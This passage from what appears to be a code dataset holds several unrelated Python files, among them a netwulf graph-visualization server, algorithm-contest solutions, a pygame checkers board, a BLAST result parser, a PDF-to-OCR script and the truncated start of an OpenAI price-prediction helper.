*args)\n\n\n\ndefault_config = {\n # Input/output\n 'zoom': 1,\n # Physics\n 'node_charge': -45,\n 'node_gravity': 0.1,\n 'link_distance': 15,\n 'link_distance_variation': 0,\n 'node_collision': True,\n 'wiggle_nodes': False,\n 'freeze_nodes': False,\n # Nodes\n 'node_fill_color': '#79aaa0',\n 'node_stroke_color': '#555555',\n 'node_label_color': '#000000',\n 'display_node_labels': False,\n 'scale_node_size_by_strength': False,\n 'node_size': 5,\n 'node_stroke_width': 1,\n 'node_size_variation': 0.5,\n # Links\n 'link_color': '#7c7c7c',\n 'link_width': 2,\n 'link_alpha': 0.5,\n 'link_width_variation': 0.5,\n # Thresholding\n 'display_singleton_nodes': True,\n 'min_link_weight_percentile': 0,\n 'max_link_weight_percentile': 1\n}\n\n\ndef visualize(network,\n port=9853,\n verbose=False,\n config=None,\n plot_in_cell_below=True,\n is_test=False,\n ):\n \"\"\"\n Visualize a network interactively using Ulf Aslak's d3 web app.\n Saves the network as json, saves the passed config and runs \n a local HTTP server which then runs the web app.\n \n Parameters\n ----------\n network : networkx.Graph or networkx.DiGraph or node-link dictionary\n The network to visualize\n port : int, default : 9853\n The port at which to run the server locally.\n verbose : bool, default : False\n Be chatty.\n config : dict, default : None,\n In the default configuration, each key-value-pair will\n be overwritten with the key-value-pair provided in `config`.\n The default configuration is\n\n .. code:: python\n\n default_config = {\n # Input/output\n 'zoom': 1,\n # Physics\n 'node_charge': -45,\n 'node_gravity': 0.1,\n 'link_distance': 15,\n 'link_distance_variation': 0,\n 'node_collision': True,\n 'wiggle_nodes': False,\n 'freeze_nodes': False,\n # Nodes\n 'node_fill_color': '#79aaa0',\n 'node_stroke_color': '#555555',\n 'node_label_color': '#000000',\n 'display_node_labels': False,\n 'scale_node_size_by_strength': False,\n 'node_size': 5,\n 'node_stroke_width': 1,\n 'node_size_variation': 0.5,\n # Links\n 'link_color': '#7c7c7c',\n 'link_width': 2,\n 'link_alpha': 0.5,\n 'link_width_variation': 0.5,\n # Thresholding\n 'display_singleton_nodes': True,\n 'min_link_weight_percentile': 0,\n 'max_link_weight_percentile': 1\n }\n\n When started from a Jupyter notebook, this will show a\n reproduced matplotlib figure of the stylized network\n in a cell below. Only works if ``verbose = False``.\n is_test : bool, default : False\n If ``True``, the interactive environment will post\n its visualization to Python automatically after 5 seconds.\n\n Returns\n -------\n network_properties : dict\n contains all necessary information to redraw the figure which\n was created in the interactive visualization\n config : dict\n contains all configurational values of the interactive\n visualization\n \"\"\"\n\n this_config = deepcopy(default_config)\n if config is not None:\n this_config.update(config)\n\n path = netwulf_user_folder\n mkdirp_customdir()\n web_dir = pathlib.Path(path)\n\n # copy the html and js files for the visualizations\n prepare_visualization_directory()\n\n # create a json-file based on the current time\n file_id = \"tmp_{:x}\".format(int(time.time()*1000)) + \".json\"\n filename = file_id\n configname = \"config_\" + filename\n\n filepath = str(web_dir / filename)\n configpath = str(web_dir / configname)\n\n with open(filepath,'w') as f:\n if type(network) in [nx.Graph, nx.DiGraph, nx.MultiDiGraph]:\n network = nx.node_link_data(network)\n if 'graph' in network:\n network.update(network['graph'])\n del network['graph']\n json.dump(network, f, iterable_as_array=True, default=_json_default)\n elif type(network) == dict:\n json.dump(network, f, iterable_as_array=True, default=_json_default)\n else:\n raise TypeError(\"Netwulf only supports `nx.Graph`, `nx.DiGraph`, `nx.MultiDiGraph`, or `dict`.\")\n\n with open(configpath,'w') as f:\n json.dump(this_config, f, default=_json_default)\n\n # change directory to this directory\n if verbose:\n print(\"changing directory to\", str(web_dir))\n print(\"starting server here ...\", str(web_dir))\n cwd = os.getcwd()\n os.chdir(str(web_dir))\n\n server = NetwulfHTTPServer((\"127.0.0.1\", port),\n NetwulfHTTPRequestHandler,\n [filepath, configpath],\n verbose=verbose,\n )\n\n # ========= start server ============\n thread = threading.Thread(None, server.run)\n thread.start()\n\n url = \"http://localhost:\"+str(port)+\"/?data=\" + filename + \"&config=\" + configname\n if is_test:\n url += \"&pytest\"\n webbrowser.open(url)\n\n try:\n while not server.end_requested:\n time.sleep(0.1)\n is_keyboard_interrupted = False\n except KeyboardInterrupt:\n is_keyboard_interrupted = True\n \n server.end_requested = True\n\n if verbose:\n print('stopping server ...')\n server.stop_this()\n thread.join(0.2)\n\n posted_network_properties = server.posted_network_properties\n posted_config = server.posted_config\n\n if verbose:\n print('changing directory back to', cwd)\n\n os.chdir(cwd)\n \n # see whether or not the whole thing was started from a jupyter notebook and if yes,\n # actually re-draw the figure and display it\n env = os.environ\n try:\n is_jupyter = 'jupyter' in pathlib.PurePath(env['_']).name\n except: # this should actually be a key error\n # apparently this is how it has to be on Windows\n is_jupyter = 'JPY_PARENT_PID' in env\n\n if is_jupyter and plot_in_cell_below and not is_keyboard_interrupted:\n if verbose:\n print('recreating layout in matplotlib ...')\n if posted_network_properties is not None:\n fig, ax = wulf.draw_netwulf(posted_network_properties)\n\n return posted_network_properties, posted_config\n\n\nif __name__ == \"__main__\":\n # download_d3()\n G = nx.fast_gnp_random_graph(100,2/100.)\n #G = nx.barabasi_albert_graph(100,1)\n posted_data = visualize(G,config={'collision':True},verbose=True)\n #if posted_data is not None:\n # print(\"received posted data:\", posted_data)\n","repo_name":"benmaier/netwulf","sub_path":"netwulf/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":11578,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"54"} +{"seq_id":"8189440088","text":"import os\nimport argparse\nimport yaml\nimport shutil\nimport logging\nimport torch.utils.tensorboard as tb\n\n\ndef args_and_config():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--config\", type=str, default='cifar10.yml',\n help=\"Choose the configs file\")\n parser.add_argument(\"--verbose\", type=str, default=\"info\",\n help=\"Verbose level: info | debug | warning | critical\")\n\n parser.add_argument(\"--sample\", action=\"store_true\",\n help=\"Whether to produce samples from the model\",)\n parser.add_argument(\"--sample_speed\", type=int, default=50,\n help=\"Control the total generation step\")\n parser.add_argument(\"--sample_type\", type=str, default=\"ddim\",\n help=\"sampling approach (ddim or ddpm)\")\n parser.add_argument(\"--use_pretrained\", action=\"store_true\")\n\n parser.add_argument(\"--device\", type=str, default='cuda',\n help=\"Choose the device to use\")\n parser.add_argument(\"--restart\", action=\"store_true\",\n help=\"Restart a previous training process\")\n\n parser.add_argument(\"--exp\", type=str, default=\"exp\",\n help=\"Path for saving running related data\")\n parser.add_argument(\"--doc\", type=str, default=\"test\",\n help=\"A string for documentation purpose\")\n\n args = parser.parse_args()\n\n args.log_path = os.path.join(args.exp, \"logs\", args.doc)\n tb_path = os.path.join(args.exp, \"tensorboard\", args.doc)\n\n # parse configs file\n with open(os.path.join(\"configs\", args.config), \"r\") as f:\n config = yaml.safe_load(f)\n\n if not args.sample:\n if not args.restart:\n if os.path.exists(args.log_path):\n shutil.rmtree(args.log_path)\n shutil.rmtree(tb_path)\n os.makedirs(args.log_path)\n os.makedirs(tb_path)\n else:\n if not os.path.exists(args.log_path):\n os.makedirs(args.log_path)\n if not os.path.exists(tb_path):\n os.makedirs(tb_path)\n\n with open(os.path.join(args.log_path, \"configs.yml\"), \"w\") as f:\n yaml.dump(config, f, default_flow_style=False)\n\n args.tb_logger = tb.SummaryWriter(log_dir=tb_path)\n # setup logger\n level = getattr(logging, args.verbose.upper(), None)\n if not isinstance(level, int):\n raise ValueError(\"level {} not supported\".format(args.verbose))\n\n handler1 = logging.StreamHandler()\n handler2 = logging.FileHandler(os.path.join(args.log_path, \"stdout.txt\"))\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n handler1.setFormatter(formatter)\n handler2.setFormatter(formatter)\n logger = logging.getLogger()\n logger.addHandler(handler1)\n logger.addHandler(handler2)\n logger.setLevel(level)\n\n else:\n level = getattr(logging, args.verbose.upper(), None)\n if not isinstance(level, int):\n raise ValueError(\"level {} not supported\".format(args.verbose))\n\n handler1 = logging.StreamHandler()\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n handler1.setFormatter(formatter)\n logger = logging.getLogger()\n logger.addHandler(handler1)\n logger.setLevel(level)\n\n if args.sample:\n os.makedirs(os.path.join(args.exp, \"image_samples\"), exist_ok=True)\n args.image_folder = os.path.join(\n args.exp, \"image_samples\", args.doc\n )\n if not os.path.exists(args.image_folder):\n os.makedirs(args.image_folder)\n\n return args, config\n","repo_name":"zzw-zwzhang/pytorch-ddpim","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"32385223429","text":"import sys\n\ninput = sys.stdin.readline\n\n# i번째 행 검사\ndef check_row(i):\n visited = [False] * n # 경사로를 놓은 곳\n for j in range(n - 1):\n d = matrix[i][j] - matrix[i][j + 1]\n if abs(d) > 1:\n return False\n\n # 오른쪽이 한칸 높음\n elif d == -1:\n if j + 1 - l < 0:\n return False\n for k in range(j + 1 - l, j + 1):\n if visited[k]:\n return False\n if matrix[i][k] != matrix[i][j]:\n return False\n visited[k] = True\n\n # 왼쪽이 한칸 높음\n elif d == 1:\n if j + l + 1 > n:\n return False\n for k in range(j + 1, j + l + 1):\n if visited[k]:\n return False\n if matrix[i][k] != matrix[i][j + 1]:\n return False\n visited[k] = True\n\n return True\n\n\nn, l = map(int, input().split())\nmatrix = [[*map(int, input().split())] for _ in range(n)]\n\ncnt = 0\nfor i in range(n):\n cnt += check_row(i)\n\n# 전치\nmatrix = list(zip(*matrix))\nfor i in range(n):\n cnt += check_row(i)\n\nprint(cnt)\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/14890_경사로.py","file_name":"14890_경사로.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25790005239","text":"import pygame\nfrom.constant import WHITE, RED, BLACK, BLUE, GREEN, PLAYER2, PLAYER1, SQUARE_SIZE, Y, X, WIDTH, HEIGHT, KING2, KING1,\\\n CROWN, GREY\n\npygame.font.init()\n# base_font_cp = pygame.font.Font('freesansbold.ttf', 50)\nbase_font_cp = pygame.font.Font('freesansbold.ttf', 25)\n\n\ndef get_all_pieces(board, player):\n \"\"\"\n :param board:\n :param player:\n :return: positions of every pieces for the giving player on the board\n \"\"\"\n\n pieces = []\n if player == PLAYER1:\n king = KING1\n else:\n king = KING2\n for i in range(Y):\n for j in range(Y):\n if board[i][j] == player or board[i][j] == king:\n pieces.append([i, j])\n return pieces\n\n\ndef draw_turn(win, player):\n \"\"\"\n :param win: Window\n :param player: player\n :return: draw which player plays now beside the board\n \"\"\"\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n if player == PLAYER1:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE//2, HEIGHT//2], radius1)\n pygame.draw.circle(win, GREEN, [WIDTH + SQUARE_SIZE//2, HEIGHT//2], radius)\n else:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE//2, HEIGHT // 2], radius1)\n pygame.draw.circle(win, RED, [WIDTH + SQUARE_SIZE//2, HEIGHT // 2], radius)\n\n\ndef creating_piece(table):\n \"\"\"\n :param table: board\n :return: a matrix with the corresponding pieces to each player\n \"\"\"\n # attributing each player his pawn\n for x in range(0, Y//2 - 1):\n k = 0\n while k < X:\n if x % 2 != 0:\n table[x][k] = PLAYER1\n k += 2\n else:\n table[x][k+1] = PLAYER1\n k += 2\n for x in range(Y//2 + 1, Y):\n k = 0\n while k < X:\n if x % 2 != 0:\n table[x][k] = PLAYER2\n k += 2\n else:\n table[x][k+1] = PLAYER2\n k += 2\n return table\n\n\ndef draw_board(win):\n \"\"\"\n :param win: Window\n :return: draw the board on our window\n \"\"\"\n win.fill(BLACK)\n for i in range(Y):\n for j in range(X):\n if i % 2 == 0 != j % 2:\n pygame.draw.rect(win, WHITE, (i * SQUARE_SIZE, j * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n elif i % 2 != 0 == j % 2:\n pygame.draw.rect(win, WHITE, (i * SQUARE_SIZE, j * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n\ndef draw_piece(win, table):\n \"\"\"\n :param win: Window\n :param table: Board\n :return: draw the pieces on the board\n \"\"\"\n draw_board(win)\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n for i in range(Y):\n for j in range(X):\n if table[i][j] == PLAYER1 or table[i][j] == KING1:\n pygame.draw.circle(win, BLUE, [SQUARE_SIZE * j + SQUARE_SIZE // 2, SQUARE_SIZE * i + SQUARE_SIZE // 2],\n radius1)\n pygame.draw.circle(win, GREEN, [SQUARE_SIZE*j + SQUARE_SIZE // 2, SQUARE_SIZE*i + SQUARE_SIZE//2],\n radius)\n elif table[i][j] == PLAYER2 or table[i][j] == KING2:\n pygame.draw.circle(win, BLUE, [SQUARE_SIZE * j + SQUARE_SIZE // 2, SQUARE_SIZE * i + SQUARE_SIZE // 2],\n radius1)\n pygame.draw.circle(win, RED, [SQUARE_SIZE*j + SQUARE_SIZE // 2, SQUARE_SIZE*i + SQUARE_SIZE//2],\n radius)\n if table[i][j] == KING1 or table[i][j] == KING2:\n win.blit(CROWN, (SQUARE_SIZE * j + SQUARE_SIZE // 2 - CROWN.get_width()//2, SQUARE_SIZE*i +\n SQUARE_SIZE//2 - CROWN.get_height()//2))\n draw_captured_pieces(win, table)\n\n\ndef draw_possible_moves(win, possible):\n \"\"\"\n :param win: Window\n :param possible: possible moves of the chosen piece in an array\n :return: draw the moves in grey on the board\n \"\"\"\n radius = SQUARE_SIZE * 0.2\n for element in possible:\n pygame.draw.circle(win, GREY, [SQUARE_SIZE * element[1] + SQUARE_SIZE // 2, SQUARE_SIZE * element[0]\n + SQUARE_SIZE // 2], radius)\n\n\ndef draw_captured_pieces(win, table):\n \"\"\"\n :param win: Window\n :param table: game matrix\n :return: draw the captured pieces beside the game board\n \"\"\"\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n captured_pieces_p1 = captured_pieces_p2 = 0\n\n for i in range(Y):\n for j in range(Y):\n if table[i][j] == PLAYER1 or table[i][j] == KING1:\n captured_pieces_p1 += 1\n elif table[i][j] == PLAYER2 or table[i][j] == KING2:\n captured_pieces_p2 += 1\n\n captured_pieces_p1 = (((Y // 2) - 1) * (X // 2)) - captured_pieces_p1\n captured_pieces_p2 = (((Y // 2) - 1) * (X // 2)) - captured_pieces_p2\n\n cp2 = base_font_cp.render(str(captured_pieces_p1), True, RED)\n cp1 = base_font_cp.render(str(captured_pieces_p2), True, GREEN)\n\n win.blit(cp1, (WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE // 2 - 15))\n # win.blit(cp1, (WIDTH + SQUARE_SIZE//2 - 25, SQUARE_SIZE//2 - 50))\n win.blit(cp2, (WIDTH + SQUARE_SIZE//2 - 25, HEIGHT - SQUARE_SIZE//2))\n\n counter1 = counter2 = 0\n for i in range(captured_pieces_p2 + captured_pieces_p1):\n if counter2 < captured_pieces_p2:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE + (i*10)], radius1)\n pygame.draw.circle(win, RED, [WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE + (i*10)], radius)\n counter2 += 1\n if counter1 < captured_pieces_p1:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE // 2, HEIGHT - (SQUARE_SIZE + (i*10))], radius1)\n pygame.draw.circle(win, GREEN, [WIDTH + SQUARE_SIZE // 2, HEIGHT - (SQUARE_SIZE + (i*10))], radius)\n counter1 += 1\n\n\ndef mouse_position(pos):\n \"\"\"\n get the mouse position when clicked on and convert it to the corresponding position integers in our matrix\n :param: position of the mouse on the screen\n :return: matrix index\n \"\"\"\n x, y = pos\n m = x // SQUARE_SIZE\n n = y // SQUARE_SIZE\n return n, m\n","repo_name":"Yameni-code/Checkers","sub_path":"Dame/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32385675349","text":"import sys\n\nsys.setrecursionlimit(100000)\ninput = sys.stdin.readline\n\n\ndef dfs(x):\n global cnt\n cnt += 1\n d[x] = cnt\n parent = d[x]\n stack.append(x)\n\n for nxt in graph[x]:\n if d[nxt] == 0:\n parent = min(parent, dfs(nxt))\n elif not finished[nxt]:\n parent = min(parent, d[nxt])\n\n if parent == d[x]:\n scc = []\n while True:\n top = stack.pop()\n scc.append(top)\n finished[top] = True\n if top == x:\n break\n\n SCC.append(scc)\n\n return parent\n\n\ndef check():\n def has_in_edge(scc):\n for x in scc:\n for y in in_graph[x]:\n if y not in scc:\n return True\n return False\n\n if len(SCC) == 1:\n return True\n\n if has_in_edge(SCC[-1]):\n return False\n\n for i in range(len(SCC) - 2, -1, -1):\n if not has_in_edge(SCC[i]):\n return False\n\n return True\n\n\nt = int(input())\nfor tc in range(t):\n n, m = map(int, input().split())\n\n cnt = 0\n d = [0] * n\n finished = [False] * n\n\n in_graph = [[] for _ in range(n)]\n graph = [[] for _ in range(n)]\n for _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n in_graph[b].append(a)\n\n stack = []\n SCC = []\n\n for i in range(n):\n if d[i] == 0:\n dfs(i)\n\n if not check():\n print(\"Confused\")\n else:\n for i in sorted(SCC[-1]):\n print(i)\n\n if tc != t - 1:\n input()\n print()\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/3977_축구전술.py","file_name":"3977_축구전술.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19925659847","text":"import numpy as np\n\ndef singhvals(c_struct, target_dist, true_param=None, n_samples = 1000):\n assert n_samples >= 2, 'n_samples must be greater than 2.'\n n_samples = int(n_samples)\n if true_param is None:\n true_param = [T[0] for T in target_dist(n_samples)]\n else:\n true_param = [true_param]*n_samples\n if isinstance(c_struct(true_param[0], target_dist(1)[0]), (list, tuple, np.ndarray)):\n singhvals = [list(s) for s in [*zip(*map(c_struct, true_param, target_dist(n_samples)))]]\n [s.sort() for s in singhvals]\n else:\n singhvals = [*map(c_struct, true_param, target_dist(n_samples))]\n singhvals.sort()\n return singhvals\n\n\ndef struct_to_consonant(c_struct, data):\n if isinstance(c_struct(domain[0], data), (list, tuple, np.ndarray)):\n return lambda x: 2 * c_struct(x, data)[1] if c_struct(x, data)[1] < 0.5 else 1 if c_struct(x, data)[0] < 0.5 else 2 * (1 - c_struct(x, data)[0])\n else:\n return lambda x: 2 * c_struct(x, data) if c_struct(x, data) < 0.5 else 2 * (1 - 2 * c_struct(x, data))\n","repo_name":"Institute-for-Risk-and-Uncertainty/Singh-Tools","sub_path":"singhtools/singhtools.py","file_name":"singhtools.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33725628917","text":"# Link : https://practice.geeksforgeeks.org/problems/n-meetings-in-one-room-1587115620/1\n\n# Input:\n# N = 6\n# start[] = {1,3,0,5,8,5}\n# end[] = {2,4,6,7,9,9}\n# Output: \n# 4\n\n# Meetings = [(1,2) , (3,4) , (0,6) , (5,7) , (8,9) , (5,9)]\n# Required Output - > Get the max number of meetings that can be scheduled from the timings given \n\n# Get the maximum number of short meetings from the list of meetings\n\n# Sorting The meetings wrt Start time -> [(0,6),(1,2),(3,4),(5,7),(5,9)]\n# O/p = (0,6) => 1 meeting can be scheduled ad the end time of the meeting is 6 and there is no meeting\n# starting after 6 , so Op is 1\n\n# Sorting the meetings wrt End Time , Start time-> [(1,2) , (3,4) , (0,6) , (5,7) , (5,9) , (8,9) ]\n\n# Op = [(1,2) , (3,4) , (5,7) , (8,9) ] => 4\n\n# Condition for selecting a meeting - > Start time of the meeting should be greater than\n# the end time of the previous meeting\n\n# Approach :\n\n# Variables :\n# i = Track the previous meetings -> i = 0\n# j = Track the current meetings -> j = 1\n# counter = Count of number of meetings that can be scheduled -> counter = 1\n# By default the first meeting will be scheduled , so counter initialized with value 1\n\n# 1. Make a list of Meetings with start time and end time \n# 2. Sort the list wrt start time and then sort it wrt to end time\n# 3. Iterate through the meetings and check the condition that whether the start time of the current \n# meeting is greater than the end time of the previous meeting \n\n# for j in range(1, n):\n# if(Meetings[j][0] > Meetings[i][1]):\n# counter ++\n# i = j\n\n# 4. Return counter\n\n\nimport sys\nimport io\n\nclass Solution:\n \n #Function to find the maximum number of meetings that can\n #be performed in a meeting room.\n def maximumMeetings(self,n,start,end):\n # code here\n Meetings = []\n for i in range(n):\n Meetings.append([start[i] , end[i]])\n \n Meetings.sort(key = lambda x : x[0])\n Meetings.sort(key = lambda x : x[1])\n # To track the previous meeting\n i = 0 \n # To track the current meeting\n j = 1\n # First meeting always gets selected\n counter = 1\n \n for j in range(1,n):\n # Condition for scheduling\n if(Meetings[j][0] > Meetings[i][1]):\n counter += 1\n i = j\n \n # print(Meetings)\n return counter\n \nif __name__ == '__main__':\n test_cases = int(input())\n for cases in range(test_cases):\n n = int(input())\n start_time = list(map(int , input().strip().split()))\n end_time = list(map(int , input().strip().split()))\n ob = Solution()\n print(ob.maximumMeetings(n,start_time , end_time))","repo_name":"smv1999/CompetitiveProgrammingQuestionBank","sub_path":"DSA 450 GFG/ActivitySelection.py","file_name":"ActivitySelection.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1181,"dataset":"github-code","pt":"54"} +{"seq_id":"22528181055","text":"# -*- coding: utf-8 -*-\r\nfrom .basePage import basePage\r\nfrom . import elementConfig as point\r\nimport time\r\n\r\n\r\nclass FlightPage(basePage):\r\n def select_ways(self, way):\r\n self.log.info(\"选择航程类型\")\r\n way = int(way)\r\n elements = self.getElementlist(0, 1, **point.FLIGHTPAGE[\"type_container\"])\r\n elements[way-1].click()\r\n\r\n def go_citypage(self, city):\r\n self.log.info(\"选择%s地\" % city)\r\n self.find_element(*point.FLIGHTPAGE[city]).click()\r\n\r\n def search(self):\r\n self.log.info(\"搜索\")\r\n self.find_element(*point.FLIGHTPAGE[\"search\"]).click()\r\n\r\n def verify_page(self):\r\n return self.isElement_exist(*point.FLIGHTPAGE[\"search\"])\r\n\r\n def select_cabin(self, cabin):\r\n self.log.info(\"选择舱位\")\r\n self.find_element(*point.FLIGHTPAGE[\"cabin\"]).click()\r\n num = self._cabin_to_number(cabin)\r\n for i in range(0, num):\r\n self.swipedown_little(0.95, 0.90)\r\n time.sleep(1)\r\n self.find_element(*point.FLIGHTPAGE[\"confirm\"]).click()\r\n\r\n def _cabin_to_number(self,cabin):\r\n return {\r\n \"经济舱\": 0,\r\n \"高端经济舱\": 1,\r\n \"商务舱\": 2,\r\n \"头等舱\": 3\r\n }[cabin]","repo_name":"liushan22/python-appium","sub_path":"testSet/page/flightPage.py","file_name":"flightPage.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32404085778","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#load notebook with code below uncommented if size of file is too large for memory:\n#jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nimport pandas as pd\nimport numpy as np\nimport json\nfrom pandas.io.json import json_normalize #package for flattening json in pandas df\nimport flatten_json\nimport objectpath\n\n#load json\nwith open(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_ReBLAST.json\") as f:\n data = json.load(f)\n\n#put json into pandas df\nraw = json_normalize(data[\"BlastOutput2\"], sep=\"_\")\ndf = pd.DataFrame(raw)\n\n\n### loop through df to extract node and taxids for each ###\n\ndf_final = pd.DataFrame(columns=[\"nodename\", \"hit_number\", \"taxid\", \"description\"])\n\nfor x in range(len(df)):\n nodename = df[\"report_results_search_query_title\"].iloc[x]\n Hit = df[\"report_results_search_hits\"].iloc[x]\n print(\"Working on\", x)\n\n for hit_dict in Hit:\n hit_dict_descr = hit_dict[\"description\"]\n hit_dict_num = hit_dict[\"num\"]\n hit_dict_descr = hit_dict_descr[0]\n taxid = hit_dict_descr[\"taxid\"]\n diction = {\"nodename\":[nodename], \"hit_number\": [hit_dict_num], \"taxid\": [taxid], \"description\":[hit_dict_descr]}\n df_temp = pd.DataFrame.from_dict(diction)\n df_final = df_final.append(df_temp)\n\nprint(df_final.head())\n\n#get list of nodes with mus musculus taxid\ndf_final_mus = df_final.loc[df_final['taxid'] == 10090]\ndf_final_filter_unique = pd.DataFrame(df_final_mus.nodename.unique(), columns=[\"nodename\"])\n\n# download tab fasta to filter fasta\ndf_fasta = pd.read_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_All_K75_blastedcontigs_cleaned_named_filteredTABAllFASTA.txt\", sep=\"\\t\")\n\n#rename column\ndf_fasta.rename(columns={\"node\": \"nodename\"}, inplace=True)\n\n#filter out nodes with mus musculus from tab fasta \ndf_fasta_cleaned = df_fasta[df_fasta[\"nodename\"].isin(df_final_filter_unique[\"nodename\"]) == False]\ndf_fasta_cleaned_r = df_fasta_cleaned[[\"nodename\", \"fasta\"]]\ndf_fasta_cleaned_r.to_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/SleepMice_musremoved_finalfasta.txt\", sep=\"\\t\", header=None, index=None)\n\n#### clean gtf file ####\n\n# download gtf to filter fasta\ndf_gtf = pd.read_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_All_K75_blastedcontigs_cleaned_named_filtered_jgi.gtf\", sep=\"\\t\", header=None)\n\n\n# filter and write out gtf\ndf_gtf_cleaned = df_gtf[df_gtf[0].isin(df_final_filter_unique[\"nodename\"]) == False]\ndf_gtf_cleaned.to_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/SleepMice_musremoved.gtf\", sep=\"\\t\", header=None, index=None)\n\n","repo_name":"PGonzo/Bioinformatics","sub_path":"BLAST_JSON_parser.py","file_name":"BLAST_JSON_parser.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28924723980","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profile_user', '0003_auto_20161203_2133'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user_details',\n name='any_congential',\n field=models.NullBooleanField(default=False),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='user_details',\n name='surgery_accident',\n field=models.CharField(default=b'', max_length=25),\n preserve_default=True,\n ),\n ]\n","repo_name":"stuti-187/Disease_Prediction_Using_ANN","sub_path":"website/profile_user/migrations/0004_auto_20161203_2137.py","file_name":"0004_auto_20161203_2137.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18577184438","text":"#import pytesseract\nfrom wand.image import Image\nimport os\nimport time\n\nos.chdir(\"/Users/zalazhar/projects/RR/\")\nfilename = \"pdfs/apr_1904.pdf\"\n\n\n\nfilenames = [\"pdfs/\" + x for x in os.listdir(\"pdfs\")]\n\nfor filename in [filenames[4]]: \n \n print(filename)\n # # Open the PDF file\n png_files = []\n with Image(filename= filename, resolution=600) as img:\n # Iterate over each page in the PDF file\n for i, page in enumerate(img.sequence):\n # Convert the page to a PNG image\n with Image(page) as png:\n png.format = 'png'\n png_filename = f'mozilla_page{i}.png'\n png.save(filename=png_filename)\n png_files.append(png_filename)\n \n print(i)\n\n\n directory = filename.replace(\".pdf\",\"\").replace(\"pdfs/\",\"\")\n\n \n if not os.path.exists(directory):\n os.mkdir( os.getcwd() + \"/\" + directory )\n print(os.getcwd() + \"/\" + directory)\n for png in png_files:\n # Apply OCR to the image and extract text\n png_to = png.replace(\".png\",\"\" )\n print(png)\n cmd = f'tesseract -l eng+ara {png} {png_to}'\n os.system(cmd)\n os.system(f\"rm -rf *.png \")\n os.system(f\"mv *.txt {directory}\")\n \n \n \n ","repo_name":"zalazhar/RR","sub_path":"Transform_Text.py","file_name":"Transform_Text.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"186052556","text":"import openai\nimport re\nimport random\nfrom IPython.display import clear_output\nimport re\nimport pandas as pd\nimport numpy as np\nfrom sklearn.impute import KNNImputer\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\nimport requests\nimport json\nfrom catboost import CatBoostRegressor\nbase = pd.read_csv(\"base.csv\")\nA = base['price'].to_numpy()\nbase = base.drop(\"Unnamed: 0\", axis=1)\nB = base.drop('price', axis=1).to_numpy()\nscaler = MinMaxScaler()\nscaler2 = MinMaxScaler()\nX_normalized = scaler.fit(B)\nY_norm = scaler2.fit(A.reshape(-1, 1))\n\nmodel = CatBoostRegressor()\nmodel.load_model(\"catboost_reg_model.bin\")\n\n\ndef gptRequist(field):\n url = \"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"OPENAI API KEY\" \n }\n request_data = {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [{\"role\": \"user\", \"content\": field}],\n \"temperature\": 0.7\n }\n request_json = json.dumps(request_data)\n\n response = 